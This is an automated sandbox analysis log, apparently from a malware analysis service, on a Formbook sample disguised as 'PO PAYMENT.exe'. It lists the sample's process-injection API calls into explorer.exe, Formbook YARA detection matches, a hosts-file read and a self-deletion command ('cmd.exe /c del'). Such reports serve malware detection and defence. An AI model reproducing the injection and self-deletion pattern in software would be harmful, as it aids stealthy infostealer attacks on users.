          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_015896E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_015896E0
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_01589950 NtQueueApcThread,1_2_01589950
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_015899D0 NtCreateProcessEx,1_2_015899D0
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0158B040 NtSuspendThread,1_2_0158B040
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_01589820 NtEnumerateKey,1_2_01589820
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_015898A0 NtWriteVirtualMemory,1_2_015898A0
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_01589B00 NtSetValueKey,1_2_01589B00
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0158A3B0 NtGetContextThread,1_2_0158A3B0
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_01589A10 NtQuerySection,1_2_01589A10
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_01589A80 NtOpenDirectoryObject,1_2_01589A80
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_01589560 NtWriteFile,1_2_01589560
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0158AD30 NtSetContextThread,1_2_0158AD30
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_01589520 NtWaitForSingleObject,1_2_01589520
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_015895F0 NtQueryInformationFile,1_2_015895F0
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0158A770 NtOpenThread,1_2_0158A770
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_01589770 NtSetInformationFile,1_2_01589770
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_01589760 NtOpenProcess,1_2_01589760
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0158A710 NtOpenProcessToken,1_2_0158A710
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_01589730 NtQueryVirtualMemory,1_2_01589730
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_01589FE0 NtCreateMutant,1_2_01589FE0
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_01589650 NtQueryValueKey,1_2_01589650
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_01589670 NtQueryInformationProcess,1_2_01589670
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_01589610 NtEnumerateValueKey,1_2_01589610
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_015896D0 NtCreateKey,1_2_015896D0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_05389540 NtReadFile,LdrInitializeThunk,5_2_05389540
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_053895D0 NtClose,LdrInitializeThunk,5_2_053895D0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_05389710 NtQueryInformationToken,LdrInitializeThunk,5_2_05389710
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_05389780 NtMapViewOfSection,LdrInitializeThunk,5_2_05389780
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_05389FE0 NtCreateMutant,LdrInitializeThunk,5_2_05389FE0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_05389660 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_05389660
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_05389650 NtQueryValueKey,LdrInitializeThunk,5_2_05389650
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_053896E0 NtFreeVirtualMemory,LdrInitializeThunk,5_2_053896E0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_053896D0 NtCreateKey,LdrInitializeThunk,5_2_053896D0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_05389910 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_05389910
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_053899A0 NtCreateSection,LdrInitializeThunk,5_2_053899A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_05389860 NtQuerySystemInformation,LdrInitializeThunk,5_2_05389860
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_05389840 NtDelayExecution,LdrInitializeThunk,5_2_05389840
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_05389A50 NtCreateFile,LdrInitializeThunk,5_2_05389A50
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0538AD30 NtSetContextThread,5_2_0538AD30
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_05389520 NtWaitForSingleObject,5_2_05389520
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_05389560 NtWriteFile,5_2_05389560
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_053895F0 NtQueryInformationFile,5_2_053895F0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_05389730 NtQueryVirtualMemory,5_2_05389730
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0538A710 NtOpenProcessToken,5_2_0538A710
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0538A770 NtOpenThread,5_2_0538A770
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_05389770 NtSetInformationFile,5_2_05389770
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_05389760 NtOpenProcess,5_2_05389760
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_053897A0 NtUnmapViewOfSection,5_2_053897A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_05389610 NtEnumerateValueKey,5_2_05389610
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_05389670 NtQueryInformationProcess,5_2_05389670
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_05389950 NtQueueApcThread,5_2_05389950
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_053899D0 NtCreateProcessEx,5_2_053899D0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_05389820 NtEnumerateKey,5_2_05389820
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0538B040 NtSuspendThread,5_2_0538B040
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_053898A0 NtWriteVirtualMemory,5_2_053898A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_053898F0 NtReadVirtualMemory,5_2_053898F0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_05389B00 NtSetValueKey,5_2_05389B00
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0538A3B0 NtGetContextThread,5_2_0538A3B0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_05389A20 NtResumeThread,5_2_05389A20
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_05389A10 NtQuerySection,5_2_05389A10
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_05389A00 NtProtectVirtualMemory,5_2_05389A00
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_05389A80 NtOpenDirectoryObject,5_2_05389A80
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00DE9D60 NtCreateFile,5_2_00DE9D60
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00DE9E90 NtClose,5_2_00DE9E90
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00DE9E10 NtReadFile,5_2_00DE9E10
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00DE9F40 NtAllocateVirtualMemory,5_2_00DE9F40
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00DE9D5F NtCreateFile,5_2_00DE9D5F
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00DE9E8A NtClose,5_2_00DE9E8A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00DE9E5A NtClose,5_2_00DE9E5A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00DE9F3A NtAllocateVirtualMemory,5_2_00DE9F3A
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 0_2_04EC41F50_2_04EC41F5
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 0_2_04EC17200_2_04EC1720
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 0_2_04EC11C00_2_04EC11C0
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 0_2_04EC11D00_2_04EC11D0
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 0_2_04EC19720_2_04EC1972
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 0_2_04EC19590_2_04EC1959
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 0_2_04EC17140_2_04EC1714
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_004010301_2_00401030
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0040117B1_2_0040117B
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0041E1E61_2_0041E1E6
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0041D2EF1_2_0041D2EF
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_00402D901_2_00402D90
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_00409E401_2_00409E40
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_00409E3C1_2_00409E3C
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0041D7501_2_0041D750
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0041CFA61_2_0041CFA6
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_00402FB01_2_00402FB0
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0041E7BE1_2_0041E7BE
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0154F9001_2_0154F900
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_015641201_2_01564120
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_015699BF1_2_015699BF
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0161E8241_2_0161E824
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_016010021_2_01601002
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0156A8301_2_0156A830
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_016128EC1_2_016128EC
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0155B0901_2_0155B090
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_016120A81_2_016120A8
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_015720A01_2_015720A0
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_015ECB4F1_2_015ECB4F
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0156AB401_2_0156AB40
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_01612B281_2_01612B28
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0156A3091_2_0156A309
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0157ABD81_2_0157ABD8
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0160DBD21_2_0160DBD2
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_016003DA1_2_016003DA
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_015F23E31_2_015F23E3
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0156EB9A1_2_0156EB9A
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0157138B1_2_0157138B
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0157EBB01_2_0157EBB0
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0156B2361_2_0156B236
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_015FFA2B1_2_015FFA2B
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_01604AEF1_2_01604AEF
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_016122AE1_2_016122AE
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_01611D551_2_01611D55
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_01612D071_2_01612D07
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_01540D201_2_01540D20
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0155D5E01_2_0155D5E0
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_016125DD1_2_016125DD
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_015725811_2_01572581
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_01602D821_2_01602D82
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0160D4661_2_0160D466
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0156B4771_2_0156B477
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0155841F1_2_0155841F
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_016044961_2_01604496
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_01611FF11_2_01611FF1
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0161DFCE1_2_0161DFCE
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_015656001_2_01565600
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_01566E301_2_01566E30
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0160D6161_2_0160D616
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_01612EF71_2_01612EF7
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_015F1EB61_2_015F1EB6
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_05340D205_2_05340D20
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_05411D555_2_05411D55
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_05412D075_2_05412D07
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_054125DD5_2_054125DD
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_053725815_2_05372581
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_05402D825_2_05402D82
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0535D5E05_2_0535D5E0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0540D4665_2_0540D466
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0535841F5_2_0535841F
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0536B4775_2_0536B477
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_054044965_2_05404496
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0541DFCE5_2_0541DFCE
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_05411FF15_2_05411FF1
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_05366E305_2_05366E30
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0540D6165_2_0540D616
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_05412EF75_2_05412EF7
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_053641205_2_05364120
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0534F9005_2_0534F900
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_053699BF5_2_053699BF
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0536A8305_2_0536A830
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_054010025_2_05401002
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0541E8245_2_0541E824
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_053720A05_2_053720A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0535B0905_2_0535B090
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_054128EC5_2_054128EC
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_054120A85_2_054120A8
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0536A3095_2_0536A309
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_05412B285_2_05412B28
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_053ECB4F5_2_053ECB4F
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0536AB405_2_0536AB40
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0537EBB05_2_0537EBB0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0540DBD25_2_0540DBD2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_054003DA5_2_054003DA
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0537138B5_2_0537138B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_053F23E35_2_053F23E3
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0537ABD85_2_0537ABD8
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0536B2365_2_0536B236
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_053FFA2B5_2_053FFA2B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_05404AEF5_2_05404AEF
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_054122AE5_2_054122AE
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00DEE1E65_2_00DEE1E6
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00DD2D905_2_00DD2D90
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00DD9E405_2_00DD9E40
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00DD9E3C5_2_00DD9E3C
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00DEE7BE5_2_00DEE7BE
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00DD2FB05_2_00DD2FB0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00DECFA65_2_00DECFA6
          Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 0534B150 appears 136 times
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: String function: 0154B150 appears 145 times
          Source: PO PAYMENT.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: PO PAYMENT.exe, 00000000.00000000.338369096.0000000000B2C000.00000002.00020000.sdmpBinary or memory string: OriginalFilename) vs PO PAYMENT.exe
          Source: PO PAYMENT.exe, 00000000.00000002.348778465.0000000001280000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PO PAYMENT.exe
          Source: PO PAYMENT.exe, 00000000.00000002.352682981.0000000005FE0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameB2B.exe4 vs PO PAYMENT.exe
          Source: PO PAYMENT.exe, 00000001.00000002.388683659.00000000017CF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO PAYMENT.exe
          Source: PO PAYMENT.exe, 00000001.00000002.387659502.0000000000A4C000.00000002.00020000.sdmpBinary or memory string: OriginalFilename) vs PO PAYMENT.exe
          Source: PO PAYMENT.exe, 00000001.00000002.389679450.000000000337E000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameEXPLORER.EXEj% vs PO PAYMENT.exe
          Source: PO PAYMENT.exeBinary or memory string: OriginalFilename) vs PO PAYMENT.exe
          Source: 00000001.00000002.388013673.00000000013E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.388013673.00000000013E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.604664988.0000000004F10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.604664988.0000000004F10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.351324564.0000000003EBA000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.351324564.0000000003EBA000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.386845572.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.386845572.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.602944720.0000000000DD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.602944720.0000000000DD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.388044010.0000000001410000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.388044010.0000000001410000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.604710630.0000000004F40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.604710630.0000000004F40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.PO PAYMENT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.PO PAYMENT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.PO PAYMENT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.PO PAYMENT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@4/4
          Source: C:\Users\user\Desktop\PO PAYMENT.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO PAYMENT.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6096:120:WilError_01
          Source: unknownProcess created: C:\Windows\SysWOW64\explorer.exe
          Source: PO PAYMENT.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\PO PAYMENT.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\PO PAYMENT.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: PO PAYMENT.exeReversingLabs: Detection: 35%
          Source: unknownProcess created: C:\Users\user\Desktop\PO PAYMENT.exe 'C:\Users\user\Desktop\PO PAYMENT.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\PO PAYMENT.exe {path}
          Source: unknownProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO PAYMENT.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\PO PAYMENT.exeProcess created: C:\Users\user\Desktop\PO PAYMENT.exe {path}Jump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO PAYMENT.exe'Jump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\PO PAYMENT.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: PO PAYMENT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: PO PAYMENT.exeStatic file information: File size 1077760 > 1048576
          Source: PO PAYMENT.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: explorer.pdbUGP source: PO PAYMENT.exe, 00000001.00000002.388889089.0000000003030000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.369335175.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: PO PAYMENT.exe, 00000001.00000002.388454014.000000000163F000.00000040.00000001.sdmp, explorer.exe, 00000005.00000002.607062972.000000000543F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: PO PAYMENT.exe, explorer.exe
